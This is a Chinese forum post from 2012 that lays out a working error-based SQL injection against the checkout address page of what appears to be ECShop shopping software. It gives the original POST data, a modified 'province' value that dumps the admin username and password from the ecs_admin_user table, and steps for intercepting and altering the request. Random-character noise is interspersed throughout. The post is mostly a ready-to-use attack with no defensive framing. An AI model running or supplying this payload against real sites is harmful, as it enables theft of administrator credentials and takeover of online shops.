感谢欠杀的黑盒
0 U8 E" l7 R f$ [; t+ `
2 Z6 s8 ^. P2 Z5 x) }/ c 0 [4 h$ d$ O# H) e+ f* R
把任意商品加入购物车在填写配送地址那一页,有地区选择, M$ I4 \; S7 P0 `5 E/ ?
# c% {* | }/ C; |flow.php?step=consignee&direct_shopping=1
) Z, y: `& \/ d2 \" V比如省选择安徽1 s6 j% f' i4 R; c
. J) ~( p& w/ [1 C6 p
其中POST数据如下$ q7 a0 u9 X4 V! w/ M$ m
3 Z! ^" r; _. m) ~
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=37 p! L( `9 Q* |! }' H( r9 ]
改成
* O. d7 S3 O, x& \# j 7 m) i( R0 @, {+ Z1 O. Z
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #0 ]/ L/ f" `: Y# U
ps:详细的方法,用火狐tamper data插件……..即可改post内容…..) Z+ t. L9 S7 C1 }; Z5 q$ I! l
. i1 _$ C2 A$ c( D( j' A, c @% @
先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包$ g( ^$ f, {3 `3 e
: \" f; R6 [' ~: |
就会回显错误页面了。。。。" S" N8 F+ N7 n3 O
/ X! i" {2 ^; T* Q' C+ u: h我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的
: d6 Q7 q' ~ z8 q |
发表于 2012-12-31 09:19:27
收藏
支持
反对